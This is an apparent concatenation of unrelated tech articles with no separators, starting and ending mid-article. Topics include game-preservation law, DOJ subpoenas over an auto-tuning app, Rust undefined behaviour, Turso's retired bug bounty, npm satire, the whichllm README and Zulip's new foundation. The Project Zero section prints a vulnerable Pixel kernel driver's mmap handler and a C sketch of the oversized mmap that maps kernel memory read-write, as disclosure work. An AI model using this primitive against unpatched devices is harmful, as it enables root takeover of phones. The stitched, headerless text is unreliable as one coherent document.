In a formal statement of support for the bill sent to the California legislature, SKG wrote that “there is no other medium in which a product can be marketed and sold to a consumer and then ripped away without notice… As live service games rise in popularity for game developers and gamers alike, end-of-life procedures are essential tools to ensure prolonged access to the games consumers pay to enjoy.”
The Entertainment Software Association, which helps represent the interests of major game publishers, publicly told the California Assembly last month that the bill misrepresents how modern game distribution actually works. “Consumers receive a license to access and use a game, not an unrestricted ownership interest in the underlying work,” the ESA wrote. The eventual shutdown of outdated or obsolete games is “a natural feature of modern software,” the group added, especially when that software requires online infrastructure maintenance.
The ESA also said the bill would impose unreasonable expectations on publishers regarding licensing rights for music or IP rights, which are often negotiated on a time-limited basis. “A legal requirement to keep games playable indefinitely could place publishers in an impossible position—forcing them to renegotiate licenses indefinitely or alter games in ways that may not be legally or technically feasible,” they wrote.
Last month, the Protect Our Games Act also received positive votes from the California Assembly’s Privacy and Consumer Protection and Judiciary committees. But the bill still faces significant hurdles in getting majority passage in the full California Assembly and the California Senate before being sent to California Governor Gavin Newsom for signature.
Still, the current legislative progress in California has to be heartening for the Stop Killing Games movement, which has seen its momentum in the UK stall a bit after a UK Parliament debate on game preservation last November.
The U.S. Department of Justice is seeking personal data on potentially hundreds of thousands of drivers who downloaded EZ Lynk’s Auto Agent app, escalating a years-long legal battle over vehicle emissions controls. Subpoenas issued to Apple, Google, Amazon, and Walmart request names, addresses, phone numbers, and purchase histories tied to the app and its accompanying hardware.
Background on the Case
The DOJ first sued EZ Lynk in 2021, accusing the Cayman Islands-based company of violating the Clean Air Act by marketing and selling “defeat devices.” These tools allegedly allow users to bypass factory emissions controls on diesel vehicles, primarily through the EZ Lynk Auto Agent app paired with an onboard diagnostic (OBD) hardware dongle.
EZ Lynk strongly denies the allegations, emphasizing that its products serve legitimate purposes: monitoring vehicle performance, applying software updates, and enabling legitimate modifications and diagnostics. The company argues that any emissions-related use is not its primary purpose and falls under user responsibility.
Scope of the Subpoenas
According to a joint court filing earlier this month, the DOJ subpoenaed Apple and Google in March and April 2026 for download and account data on anyone who installed the Auto Agent app. Additional requests went to Amazon and Walmart for buyer information on the physical EZ Lynk hardware. Estimates suggest the total could exceed 100,000 users, Gizmodo reports.
The government says it needs this information to identify and interview witnesses who can testify about how the tools were actually used. It has already submitted forum posts and social media evidence showing some users employing the system to disable emissions controls.
Privacy Concerns and Pushback
EZ Lynk’s lawyers call the requests “overreach,” arguing they go far beyond what’s necessary for the case and raise serious Fourth Amendment issues. “Investigating this claim does not require identifying each person who has used the product,” they wrote. Apple and Google are reportedly preparing to challenge the subpoenas.
Privacy advocates echo these concerns. The Electronic Frontier Foundation (EFF) and Electronic Privacy Information Center (EPIC) have criticized the broad demand for personally identifiable information, noting that most users never read terms of service and may face unintended legal exposure simply for downloading a tool marketed for car diagnostics and tuning.
Car enthusiasts and right-to-repair advocates view the case as part of a broader tension: drivers’ desire to modify their vehicles versus federal environmental regulations. As one expert noted, “People want to modify their cars and always will.”
What Happens Next
The case has already survived an attempt by EZ Lynk to invoke Section 230 immunity (typically used to shield tech platforms from liability for user actions). A judge rejected that defense in 2025, allowing the litigation to continue.
This episode highlights growing government interest in app store data to pursue enforcement actions. Similar but smaller-scale requests have occurred before, such as a 2019 demand for data on users of a gun-scope app. The current scale (potentially 10 times larger) makes it particularly notable.
Apple, Google, and the other companies have not publicly commented. The DOJ also declined to elaborate beyond its court filings. The outcome of any challenges to the subpoenas could set important precedents for digital privacy in regulatory enforcement cases. For car owners using tuning tools, the message is clear: governments are increasingly willing to trace app downloads straight back to individual users.
MacDailyNews Take: The DOJ is overreaching as this would sweep up people who simply used the app to read their vehicle’s trouble codes or for other mundane reasons.
error: Undefined Behavior: constructing invalid value of type &[u8]: encountered a dangling reference (0x20933[noalloc] has no provenance)
  --> src/main.rs:97:18
   |
97 |         unsafe { core::slice::from_raw_parts(ptr as *const u8, self.len()) }
   |                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Undefined Behavior occurred here
   |
   = help: this indicates a bug in the program: it performed an invalid operation, and caused Undefined Behavior
   = help: see https://doc.rust-lang.org/nightly/reference/behavior-considered-undefined.html for further information
   = note: stack backtrace:
      0: PathString::slice at src/main.rs:97:18: 97:75
      1: main at src/main.rs:130:22: 130:34
code:
fn main() {
    let test = Box::new(*b"Hello World");
    let init = PathString::init(&*test);
    drop(test);
    println!("{:?}", init.slice());
}
Please consider not vibe coding Rust, as AIs are not good at writing Rust, and also hire a real Rust dev.
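For reference, a borrow-based rewrite avoids the dangling pointer entirely. This is only a sketch: the original PathString definition isn't shown, so the struct below is a hypothetical reconstruction that stores a borrowed slice instead of a raw pointer.

struct PathString<'a> {
    // Borrow the bytes instead of stashing a raw pointer (hypothetical
    // reconstruction; the original type definition is not shown above).
    bytes: &'a [u8],
}

impl<'a> PathString<'a> {
    fn init(bytes: &'a [u8]) -> Self {
        PathString { bytes }
    }

    fn slice(&self) -> &'a [u8] {
        // No unsafe needed; the borrow checker guarantees validity.
        self.bytes
    }
}

fn main() {
    let test = Box::new(*b"Hello World");
    let init = PathString::init(&*test);
    // A drop(test) here would now fail to compile, because `init`
    // still borrows the buffer.
    println!("{:?}", init.slice());
}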
We recently published an exploit chain for the Google Pixel 9 that demonstrated it was possible to go from a zero-click context to root on Android in just two exploits. The Dolby 0-click vulnerability existed across all of Android, until it was patched in January 2026. While we had an exploit chain for the Pixel 9, we wanted to see if it was possible to write a similar exploit chain for Pixel 10.
Updating the Dolby Exploit
Altering our exploit for CVE-2025-54957 was fairly straightforward. The majority of the needed changes involved updating offsets calculated for the specific version of the library we targeted on the Pixel 9 to the corresponding offsets in the Pixel 10 library. The only challenge (outside of wishing we’d better documented which syncframes contained offsets) was that the Pixel 10 uses RET PAC in place of -fstack-protector, which meant that __stack_chk_fail wasn’t available to be overwritten. After a bit of trial and error, we used dap_cpdp_init instead: initialization code that can be overwritten without causing functional problems, as it is called once when the decoder is initialized and never again.
The updated Dolby UDC exploit is available here. This exploit will only work on unpatched devices (SPL December 2025 or earlier).
Removal of BigWave, Addition of VPU
Porting the local privilege escalation link of the chain to Pixel 10 was not feasible as the BigWave driver does not ship on this device. However, a new driver is visible in the mediacodec SELinux context at /dev/vpu. This driver is used for interacting with the Chips&Media Wave677DV silicon on the Tensor G5 chip meant for accelerating video decoding. Based on the comments within the open-source C files, this driver is developed and maintained by the same set of developers who built the BigWave driver. Working in collaboration with Jann Horn, we spent 2 hours auditing this VPU driver and discovered an exceptional vulnerability.
Unlike the upstream Linux driver for WAVE521C (which is an older Chips&Media chip), the Pixel driver for WAVE677DV does not integrate with V4L2 (the “Video for Linux API”); instead, it directly exposes the chip’s hardware interface to userspace, including letting userspace map the chip’s MMIO register interface. The driver mainly establishes device memory mappings, does power management, and allows userspace to wait for interrupts from the chip.
The Holy Grail of Kernel Vulnerabilities
This bug in particular caught our attention as exceptionally simple to exploit:
static int vpu_mmap(struct file *fp, struct vm_area_struct *vm)
{
	unsigned long pfn;
	struct vpu_core *core = container_of(fp->f_inode->i_cdev,
					     struct vpu_core, cdev);

	vm_flags_set(vm, VM_IO | VM_DONTEXPAND | VM_DONTDUMP);
	/* This is a CSRs mapping, use pgprot_device */
	vm->vm_page_prot = pgprot_device(vm->vm_page_prot);
	pfn = core->paddr >> PAGE_SHIFT;

	return remap_pfn_range(vm, vm->vm_start, pfn,
			       vm->vm_end - vm->vm_start,
			       vm->vm_page_prot) ? -EAGAIN : 0;
}
This mmap handler is intended to map the MMIO register region of the VPU hardware into the userland virtual address space - a region contained within a certain physical memory address range. In doing so, it calls remap_pfn_range based purely on the size of the VMA, not bounded at all by the size of the register region. This means that, by specifying a size larger than the register region in an mmap syscall, the caller can map as much physical memory as they want into userland, starting at the physical address of the VPU register region. The entirety of the kernel image (including the .text and .data regions) is located at a higher physical address than the VPU register region, and can therefore be accessed and modified by userspace with this bug.
At this point, one can simply overwrite any kernel function to gain kernel code execution - or indeed any primitive one might desire. This is rendered even easier by the fact that the kernel is always at the same physical address on Pixel and so the offset between the VPU memory region and the kernel is always a known value. Thus it is not even necessary to scan for the kernel in the mapped physical memory - you simply know exactly where it is relative to the address returned by mmap, presuming you make the VMA length large enough.
Achieving arbitrary read-write on the kernel with this vulnerability required 5 lines of code and writing a full exploit for this issue required less than a day of effort.
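Conceptually, the trigger is little more than an oversized mmap of the device node. The sketch below is illustrative only: MAP_LEN and KERNEL_OFFSET are placeholder values, not the real constants from the exploit.

/* Illustrative userspace sketch of the primitive described above;
 * placeholder constants, not the actual exploit code. */
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <sys/mman.h>

#define MAP_LEN        (1UL << 30)  /* far larger than the register region */
#define KERNEL_OFFSET  0x0UL        /* placeholder: regs-to-kernel distance */

int main(void)
{
    int fd = open("/dev/vpu", O_RDWR);
    if (fd < 0) { perror("open"); return 1; }

    /* The vulnerable handler remaps MAP_LEN bytes of physical memory
     * starting at the VPU register region, with no size check. */
    void *map = mmap(NULL, MAP_LEN, PROT_READ | PROT_WRITE,
                     MAP_SHARED, fd, 0);
    if (map == MAP_FAILED) { perror("mmap"); return 1; }

    /* The kernel image sits at a fixed physical offset above the
     * register region, so it is now directly readable and writable. */
    volatile uint8_t *kernel = (volatile uint8_t *)map + KERNEL_OFFSET;
    printf("first kernel byte: 0x%02x\n", kernel[0]);
    return 0;
}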
Patch Process
I reported this bug on November 24, 2025, and Android VRP rated the issue High severity. This is an improvement, given that the BigWave bug we used for privilege escalation on the Pixel 9 (which had identical security impact) was initially rated as Moderate severity, and it represents a meaningful, positive change in how these types of bugs are triaged and patched. The vulnerability was patched 71 days after its initial report, in the February Pixel security bulletin. That is notably fast: this is the first time an Android driver bug I reported was patched within 90 days of the vendor first learning about it.
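The obvious shape of a fix is to bound the mapping to the register region before remapping. The sketch below is an assumption about what such a check could look like (regs_size is a hypothetical field name; the shipped patch may be structured differently):

/* Hypothetical hardened handler; regs_size is an assumed field, and
 * the actual Pixel patch may differ. */
static int vpu_mmap(struct file *fp, struct vm_area_struct *vm)
{
	unsigned long pfn;
	unsigned long size = vm->vm_end - vm->vm_start;
	struct vpu_core *core = container_of(fp->f_inode->i_cdev,
					     struct vpu_core, cdev);

	/* Reject mappings larger than the MMIO register region. */
	if (size > core->regs_size)
		return -EINVAL;

	vm_flags_set(vm, VM_IO | VM_DONTEXPAND | VM_DONTDUMP);
	/* This is a CSRs mapping, use pgprot_device */
	vm->vm_page_prot = pgprot_device(vm->vm_page_prot);
	pfn = core->paddr >> PAGE_SHIFT;

	return remap_pfn_range(vm, vm->vm_start, pfn, size,
			       vm->vm_page_prot) ? -EAGAIN : 0;
}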
Conclusion
There are both positives and negatives to take from this research. A key goal of Project Zero is to drive systemic improvements that go beyond individual bug fixes, influencing better development processes and more resilient codebases that lead to improvements in security for end-users. The handling of this VPU vulnerability demonstrates clear progress in Android’s triage pipeline, as this bug had an initial remediation in a much shorter period of time than the previous BigWave issues. Android’s effort to ensure that serious vulnerabilities are patched efficiently will help protect many Android devices.
At the same time, this case underscores the ongoing need for more exhaustively robust and security-aware code in Android drivers. When I reported the bugs in BigWave, I hoped to spur its developers to evaluate their other drivers for obvious security issues, but 5 months later we nevertheless found a serious and extremely shallow vulnerability in their VPU driver that was instantly noticeable with even a cursory audit of the codebase. Strengthening driver security remains a crucial priority for ensuring a safe Android ecosystem, and we continue to strongly encourage vendors to improve software development practices in a proactive effort to prevent these sorts of vulnerabilities from ever reaching end-users.
Security reports often uncover complex issues missed by product teams, but it is important that software vendors take the necessary steps to ensure software products, especially security-critical ones, launch in a reasonably vulnerability-free state, and that software teams take a proactive approach to software security, code auditing, and vulnerability patching.
For almost a year now, Turso has had a program that pays $1,000 for any bug that can be demonstrated to lead to data corruption. Today, with immense sadness, we are retiring this program.
The reason is simple: everybody is being inundated by the slop machine. We are not unique in this regard. However, a program that offers money in exchange for a specific class of bugs is just too juicy of a target for the slop makers. For days, our maintainers have done little else other than close slop PRs claiming to have found bugs that led to data corruption in Turso. In a time where many OSS projects are closing their doors to contributions, we want to make every effort possible to keep the doors of Turso open. Being an Open Contribution project is part of our DNA. It is how Turso was born. But unfortunately, the financial reward is making this close to impossible and it has to go.
We are sharing this publicly and loudly because we believe that we will all have to find new ways to establish good governance in this new era, and should learn from each other. This is our contribution to that conversation.
#Why did we start this program
We started this program because we are rewriting SQLite, known to be one of the most reliable pieces of software in the world. The community expects a high bar from a project with such ambition, and we invest tremendous effort into making sure that we can match or even surpass SQLite’s legendary reliability. Turso ships with a native Deterministic Simulator, a collection of fuzzers, an oracle-based differential testing engine against SQLite, a concurrency simulator, and on top of that, we have extensive runs on Antithesis.
We take our testing discipline seriously. And we wanted to communicate our confidence. On the other hand, all of that testing infrastructure is, at the end of the day, just software and is not perfect. You can write all the fuzzers and simulators in the world, but they will only catch bugs in the combinations that actually get generated. For example, if your fuzzer never generates indexes, you will by definition not find any bugs related to indexes, regardless of how well you stress the rest of the system. As a real example, we found bugs that escaped our simulator because they would only appear in databases that were larger than 1GB, and because we injected faults aggressively into every run, databases would never get big enough to trigger them.
The main advantage of automated testing is that once a bug escapes your validation and you improve the test generators, an entire class of bugs goes away. So we envisioned this program as a great way to do both things: it helped us establish the confidence we had in the methodology, but at the same time, if someone did find areas that our simulators didn’t cover well, we’d be more than happy to pay for it! We started the program with a $1,000 reward for bugs that would lead to data corruption, to run until we could release a 1.0 version of Turso. Our plan was that once we reached 1.0, we would progressively increase both the size of the reward to substantial levels and the scope of the issues we’d reward people for.
#And before the “singularity”, this worked great
We were delighted by this program. We paid a total of 5 individuals, and all of them were incredibly special people. It’s worth highlighting the work of Alperen, who was actually one of the core contributors to our simulator itself (so, little surprise that he knew of a couple of places where it could be improved). Then Mikael, who used LLMs in very creative ways to identify places the simulator was not reaching (we later hired Mikael), and Pavan Nambi, who paired the simulator with formal methods and ended up not only finding bugs in Turso, but in fact more than TEN bugs in SQLite itself through his methodology.
#But after the “singularity”, we got drowned
In our experience, anybody who was skilled enough to find critical issues was someone we wanted around in our community. We did have the occasional person who tried to submit bad PRs in the hopes of collecting the bounty, but it was a rare occurrence: the requirement that the simulator had to be extended to demonstrate the bug (just pointing out the bug was not enough) helped keep the bar high, and most importantly, there just aren’t that many bugs.
But then an army of slop was released overnight. The reward became too juicy a target: just point an LLM at Turso and tell it to find a bug. And as you all know, if you instruct an LLM to go find a bug and collect a bounty, it will produce some output. Whether or not that output makes sense is a completely different story. I want to share some of those submissions with you.
#Some examples
In this PR, the author just injected garbage bytes manually into the database header, and then argued that this corrupted the database (duh!). After our maintainer pointed out that, well, no shit, Sherlock, the author (or his bot) kept arguing with the usual LLM-induced wall of text for quite a while.
You might find that unbelievable, but it is actually less incredible than modifying the source code to manually add an out-of-bounds array access to corrupt the database.
In this other PR which is full of tables, green check marks and em dashes, the author claims to have found a critical vulnerability that allows for the execution of arbitrary SQL statements. Imagine that? A SQL database that allows the execution of SQL statements. How can we ever recover from this.
This other masterpiece enables concurrent writes on Turso, one of the features that set us apart from SQLite, and then demonstrates that SQLite cannot open the file until the journal mode is set back to WAL, disabling concurrent writes (that is how the system is designed to operate).
For this other one, I wish I could write a nice description, but I have no idea what they are trying to do. As our maintainer Mikael (the same who won the award in the past!) pointed out, it is very clear that the person just saw the prize announcement, started salivating, and pointed the slop machine at us.
#The last attempt
In our last attempt to establish some order, we designed and implemented a vouching system: if we suspect that a submission is coming from a bot, we just auto-close it. And this worked okay for some time, until the bots started opening issues questioning the closing of their PRs and requesting manual inspection. They all looked the same.
We also had many instances in which we would close a PR, and the same or a very similar PR would just be opened by a different user moments later.
#It’s sad, but here we are
The main problem, of course, is that it costs the slopmaker perhaps a minute to generate a submission, but it costs us hours to read, understand, and engage with it. And submissions can be generated at a semi-infinite pace. It is possible to set up automated systems to gatekeep this, but with a non-negligible dollar value attached, the incentive is just too great for the AIs to keep arguing, reopening the same PR, and so on.
We value our Open Source community of contributors a lot, and we will continue to strengthen our community. But at this point, we just don’t believe that a financial incentive of any kind works well with an open system. We have to either close the system, or get rid of the incentive. For now, we are choosing the latter.
SAN FRANCISCO, CA - In the wake of a devastating supply chain attack in the npm registry that left millions of enterprise applications compromised and billions of user records exposed, developers across the JavaScript ecosystem expressed deep sorrow today, lamenting that such a crisis was completely unavoidable.
“It’s a shame, but what can you do? This is just the price of building modern web apps,” said Senior Frontend Engineer Mark Vance, echoing the sentiments of a community that completely relies on a 40-level-deep nested tree of unvetted packages maintained by pseudonymous strangers to capitalize a single string. “There’s absolutely no way to foresee or prevent someone from taking over a long-abandoned utility package and injecting a crypto-miner into every production build in the world. It’s just an act of nature.”
At press time, residents of the Node.js ecosystem stood unified in their belief that the malicious remote-code execution was a completely unpredictable tragedy, offering their thoughts and prayers to the DevOps teams currently scrambling to rotate their corporate AWS keys.
Interestingly, developers in ecosystems like Go, Rust, and those utilizing native Web APIs—where robust standard libraries drastically reduce reliance on third-party code and strict cryptographic verification is built into the core toolchain—reported zero instances of a college dropout’s weekend project wiping out global logistics infrastructure today.
“It’s devastating, but we have to accept that we live in a world where bad actors exist. There are no registry policies or build-sandbox guardrails we could possibly enforce to stop it,” said an npm spokesperson, standing in front of an open-source registry that happily executes arbitrary installation scripts on local machines by default. “Our hearts go out to the victims. Until the next inevitable breach tomorrow morning, we must simply remain resilient.”
Find the best local LLM that actually runs on your hardware.
Auto-detects your GPU/CPU/RAM and ranks the top models from HuggingFace that fit your system.
Japanese version available here
See it
$ whichllm --gpu "RTX 4090"
#1  Qwen/Qwen3.6-27B     27.8B  Q5_K_M  score 92.8   27 t/s
#2  Qwen/Qwen3-32B       32.0B  Q4_K_M  score 83.0   31 t/s
#3  Qwen/Qwen3-30B-A3B   30.0B  Q5_K_M  score 82.7  102 t/s
The 32B model fits your card fine — whichllm still ranks the 27B #1, because it scores higher on real benchmarks and is a newer generation. A size-only “what fits?” tool would hand you the bigger one. That gap is the whole point of whichllm. (Note #3: a MoE model at 102 t/s — speed is ranked on active params, quality on total.)
What can I run?
Real top picks (snapshot 2026-05 — your results track live HuggingFace data, this is not a static list):
Run whichllm --gpu "<your card>" to simulate any of these before you buy.
Useful? A GitHub star helps other people find it — and I’d genuinely like to know what it picked for your rig: drop it in Issues.
Why whichllm?
Fitting a model into your VRAM is the easy part. The hard part is knowing which of the models that fit is actually the best — and that is what whichllm is built to get right.
Evidence-based ranking, not a size heuristic — The top pick is chosen from merged real benchmarks (LiveBench, Artificial Analysis, Aider, multimodal/vision, Chatbot Arena ELO, Open LLM Leaderboard) — never “the biggest model that happens to fit.”
Recency-aware — Stale leaderboards are demoted along each model’s lineage, so a 2024 model can’t outrank a current-generation one on an outdated score. The benchmark snapshot date is printed under every ranking, so a stale recommendation is self-evident instead of silently trusted.
Evidence-graded and guarded — Every score is tagged direct / variant / base / interpolated / self-reported and discounted by confidence. Fabricated uploader claims and cross-family inheritance (a small fork borrowing its much larger base’s score) are actively rejected.
Architecture-aware estimates — VRAM = weights + GQA KV cache + activation + overhead; speed is bandwidth-bound with per-quant efficiency, per-backend factors, MoE active-vs-total split, and unified-memory vs discrete-PCIe partial-offload modeling (see the sketch after this list).
One command, scriptable — whichllm prints the answer; add --json | jq for pipelines. No TUI, no keybindings to memorize.
Live data — Models fetched directly from the HuggingFace API, with curated frozen fallbacks for offline or rate-limited use.
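To make the VRAM model above concrete, here is a hedged sketch of the kind of estimate described. The coefficients, defaults, and function name are illustrative assumptions, not whichllm's actual internals.

def estimate_vram_gb(params_b, bits_per_weight, n_layers, n_kv_heads,
                     head_dim, context_len, kv_bits=16, overhead_gb=0.75):
    # Weights: total params at the quant's effective bits per weight.
    weights = params_b * 1e9 * bits_per_weight / 8
    # GQA KV cache: K and V, per layer, per KV head, per context position.
    kv_cache = 2 * n_layers * n_kv_heads * head_dim * context_len * kv_bits / 8
    # Activations: rough assumed fraction of the weight footprint.
    activations = 0.02 * weights
    return (weights + kv_cache + activations) / 1e9 + overhead_gb

# Example: ~7.6B model at Q4_K_M (~4.5 bits/weight), 4k context, 8 KV heads.
print(f"{estimate_vram_gb(7.6, 4.5, 28, 8, 128, 4096):.1f} GB")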
Features
Auto-detect hardware — NVIDIA, AMD, Apple Silicon, CPU-only
Smart ranking — Scores models by VRAM fit, speed, and benchmark quality
One-command chat — whichllm run downloads and starts a chat session instantly
Code snippets — whichllm snippet prints ready-to-run Python for any model
Live data — Fetches models directly from HuggingFace (cached for performance)
Benchmark-aware — Integrates real eval scores with confidence-based dampening
Task profiles — Filter by general, coding, vision, or math use cases
GPU simulation — Test with any GPU: whichllm --gpu "RTX 4090"
Hardware planning — Reverse lookup: whichllm plan "llama 3 70b"
JSON output — Pipe-friendly: whichllm --json
Run & Snippet
Try any model with a single command. No manual installs needed — whichllm creates an isolated environment via uv, installs dependencies, downloads the model, and starts an interactive chat.
# Chat with a model (auto-picks the best GGUF variant)
whichllm run "qwen 2.5 1.5b gguf"

# Auto-pick the best model for your hardware and chat
whichllm run

# CPU-only mode
whichllm run "phi 3 mini gguf" --cpu-only
Works with all model formats:
GGUF — via llama-cpp-python (lightweight, fast)
AWQ / GPTQ — via transformers + autoawq / auto-gptq
FP16 / BF16 — via transformers
Get a copy-paste Python snippet instead:
whichllm snippet "qwen 7b"
from llama_cpp import Llama
llm = Llama.from_pretrained(
    repo_id="Qwen/Qwen2.5-7B-Instruct-GGUF",
    filename="qwen2.5-7b-instruct-q4_k_m.gguf",
    n_ctx=4096,
    n_gpu_layers=-1,
    verbose=False,
)

output = llm.create_chat_completion(
    messages=[{"role": "user", "content": "Hello!"}],
)
print(output["choices"][0]["message"]["content"])
Install
uv (recommended)
uvx whichllm
To install permanently:
uv tool install whichllm
Homebrew
brew install andyyyy64/whichllm/whichllm
pip
pip install whichllm
Development
git clone https://github.com/Andyyyy64/whichllm.git
cd whichllm
uv sync --dev
uv run whichllm
uv run pytest
Usage
# Auto-detect hardware and show best models
whichllm

# Simulate a GPU (e.g. planning a purchase)
whichllm --gpu "RTX 4090"
whichllm --gpu "RTX 5090"

# Specify variant
whichllm --gpu "RTX 5060 16"

# CPU-only mode
whichllm --cpu-only

# More results / filters
whichllm --top 20
whichllm --quant Q4_K_M
whichllm --min-speed 30
whichllm --evidence base    # allow id/base-model matches
whichllm --evidence strict  # id-exact only (same as --direct)
whichllm --direct

# JSON output
whichllm --json

# Force refresh (ignore cache)
whichllm --refresh

# Show hardware info only
whichllm hardware

# Plan: what GPU do I need for a specific model?
whichllm plan "llama 3 70b"
whichllm plan "Qwen2.5-72B" --quant Q8_0
whichllm plan "mistral 7b" --context-length 32768

# Run: download and chat with a model instantly
whichllm run "qwen 2.5 1.5b gguf"
whichllm run    # auto-pick best for your hardware

# Snippet: print ready-to-run Python code
whichllm snippet "qwen 7b"
whichllm snippet "llama 3 8b gguf" --quant Q5_K_M
Integrations
Ollama
Find the best model and run it directly:
# Pick the top model and run it with Ollama
whichllm --top 1 --json | jq -r '.models[0].model_id' | xargs ollama run

# Find the best coding model
whichllm --profile coding --top 1 --json | jq -r '.models[0].model_id' | xargs ollama run
Shell alias
Add to your .bashrc / .zshrc:
alias bestllm='whichllm --top 1 --json | jq -r ".models[0].model_id"'
# Usage: ollama run $(bestllm)
Scoring
Each model gets a 0-100 score. Benchmark quality and size form the core; evidence confidence and runtime fit then scale it, with speed, source trust, and popularity as adjustments.
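As a rough illustration of that composition (the weights below are assumptions, not whichllm's actual coefficients):

def score(bench_quality, size_fit, evidence_conf, runtime_fit,
          speed_adj, trust_adj, popularity_adj):
    # Core: benchmark quality plus size, scaled by confidence and fit.
    core = 0.7 * bench_quality + 0.3 * size_fit
    scaled = core * evidence_conf * runtime_fit
    # Speed, source trust, and popularity act as additive adjustments.
    return max(0.0, min(100.0, scaled + speed_adj + trust_adj + popularity_adj))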
Score markers:
~ (yellow) — No direct benchmark; score inherited/interpolated from the model family
? (yellow) — No benchmark data available
How it works
Data pipeline
Model fetching — Fetches popular models from HuggingFace API:
Text-generation (downloads + recently updated)
GGUF-filtered (separate query for coverage)
Vision models (image-text-to-text) when --profile vision or any
Benchmark sources — Current tier (LiveBench, Artificial Analysis Index, Aider) merged live when reachable, plus a curated multimodal / vision index; frozen tier (Open LLM Leaderboard v2, Chatbot Arena ELO). Tiers have separate caps and lineage-aware recency demotion so stale leaderboards stop over-rewarding older generations.
Benchmark evidence — Five resolution levels, increasingly discounted:

direct — Exact model ID match
variant — Suffix-stripped or -Instruct variant
base_model — Base model from cardData
line_interp — Size-aware interpolation within model family
self_reported — Uploader-claimed eval (heavily discounted)

Inheritance is rejected when a model’s params diverge more than 2× from its family’s dominant member, catching draft / MTP / abliterated forks that share a family_id with a much larger base.
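A minimal sketch of that divergence guard (function and argument names are assumptions, not whichllm's actual code):

def allow_inheritance(model_params_b, dominant_params_b):
    # Reject family-score inheritance when sizes diverge more than 2x
    # in either direction (e.g. a 1B draft fork of a 70B family).
    ratio = model_params_b / dominant_params_b
    return 0.5 <= ratio <= 2.0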
Today marks a major transition for the Zulip open-source project and for Kandra Labs, the company behind it: I’m stepping back from full-time Zulip leadership to join Anthropic, alongside three senior team members, and we’re donating the company to a newly created, independent, nonprofit Zulip Foundation. The new structure provides stability, a renewed commitment to our values, and opportunities for charitable fundraising to support our mission. This blog post explains these changes and why they set Zulip up for greater long-term success.
Zulip is a beloved organized team chat product, used by thousands of companies, open-source projects, and research communities. Zulip is known for its unique topic-based threading model, which makes it easy to have many conversations in parallel without chaos, interruptions, or stress. April’s Zulip 12.0 release included almost 5,500 commits contributed by 160 people from all around the world.
Zulip’s new ownership and governance structure
The Zulip Foundation will be the formal steward of the Zulip project, with a mission of developing the best possible team chat experience, with a particular focus on public-interest organizations and communities.
Kandra Labs, the company that has stewarded Zulip for the last decade, will now be fully and independently owned by the Zulip Foundation, with no other stockholders or debt obligations. Kandra Labs will continue hosting, supporting, and improving Zulip for use across all industries, offering an excellent experience for business customers. We’re committed to being a trustworthy, transparent vendor for our customers, and anticipate no major changes in how we conduct business.
I’m excited that this new structure — similar to governance structures for Mozilla, Signal, and Wikipedia — formalizes our longtime commitment to Zulip’s sustainability and independence.
The foundation’s initial board of directors will be:
Tim Abbott, Zulip’s founder (me).
Greg Price, who has helped me lead Zulip in a cofounder-like role for the last 9 years.
Alya Abbott, Zulip’s product lead, who has also held a cofounder-like role for the last 5 years.
Josh Triplett, a leader in the Rust programming language, experienced in open source, and a major advocate for Zulip.
We also have five incredible people signed on to share their expertise as members of an advisory board:
Andrew Sutherland, mathematician and senior researcher at the Massachusetts Institute of Technology, and President of the Number Theory Foundation. He is a leading advocate of Zulip for research collaborations, including the L-functions and Modular Forms Database.
Hazel Weakly, a former Director of the Haskell Foundation Board, open source and community advocate, and a Fellow of the Nivenly Foundation.
Jeremy Avigad, a Professor of Philosophy and Mathematical Sciences at Carnegie Mellon University and Director of the NSF Institute for Computer-Aided Reasoning in Mathematics. He is a founding member of the Lean Community organization, for which Zulip has hosted more than two million messages to date.
Nick Bergson-Shilcock, the CEO and cofounder of the Recurse Center, a programming retreat based in New York whose community of 3,000+ alums has run on Zulip since 2013.
Puneeth Chaganti, an OCaml developer working on core ecosystem tooling, and a mentor for Zulip’s Google Summer of Code program since 2018.
I’m incredibly grateful to everyone who has volunteered to help launch the Zulip Foundation. We’re looking to recruit one additional director, and to fill out a larger advisory board. If you or someone you know may be a good fit, please reach out to foundation-jobs@zulip.com to let us know!
If you’d like to follow along, please sign up for occasional email updates from the Zulip Foundation.
Stability during the leadership transition
Zulip’s operations will continue without interruption, including Zulip Cloud; the Mobile Push Notifications Service and support contracts for self-hosted organizations; our Google Summer of Code mentorship program, with 11 participants this summer; and our sponsorships for the thousands of open-source projects and other public-interest organizations that Zulip Cloud hosts free of charge.
Kim Vandiver, an experienced leader and operator, has joined Kandra Labs as Interim President to help ensure a smooth transition. This is not the first time Kim has raised her hand to help a values-focused organization in a time of change: at VaccinateCA, a rapidly evolving COVID-era effort to spread information about vaccines, Kim jumped in to revamp a variety of processes — first as a volunteer, and then as the Director of Operations. I’m extremely grateful to have her here to manage operations and help run a global search for the best possible leadership for Zulip going forward.
Operationally, both Zulip Cloud and the self-hosted experience are the most stable that they have ever been. We’ve always had a relentless focus on eliminating bugs and workflow warts, and have made an especially strong push on this in the past year. I expect there will be a reduction in development velocity over the next quarter as the organization adapts to the leadership change, but it will feel like a small blip when we look back.
A formal commitment to our values, and a new avenue for sustainable funding
There are two main reasons why I’m excited about this change: it allows us to make a permanent, public commitment to the values we’ve long operated by, and it offers a new avenue for Zulip to raise funds without ceding control.
Kandra Labs has always been a mission- and values-focused company. We have a long-running sponsorship program, and have always prioritized features primarily useful for communities alongside features for business users. Kandra Labs has been public about its values for years — including our commitments to protecting customer data privacy, and to keeping our focus on the product, not on whatever’s commercially fashionable. The Zulip Foundation formalizes and makes permanent our values beyond my tenure as CEO.
It’s hard these days to feel confident that a company whose product you love won’t yield to commercial pressure and start selling your data, putting in ads, or otherwise violating your trust. It’s been a challenge to convincingly make the case that this won’t happen to Zulip, especially to folks who might not have time to investigate deeply. The Zulip Foundation, which has the goal of serving the public good, makes this so much easier to communicate clearly.
The new foundation also puts Zulip in a much stronger fundraising position. Over the years, I’ve been reluctant to accept external funding for Zulip, even from angel investors I trust, because fiduciary duties to those investors could eventually generate pressure for us to compromise our values. As a result, the company’s funding has been driven by how much I’m able to personally invest in Zulip above and beyond its subscription revenue.
With the foundation in place, we’ll be able to apply for grants we were previously ineligible for, and receive tax-deductible donations from individual donors. The foundation can also run fundraising campaigns that would not have felt appropriate for an open-source project with a privately owned company behind it.
Why I’m stepping back from full-time Zulip leadership
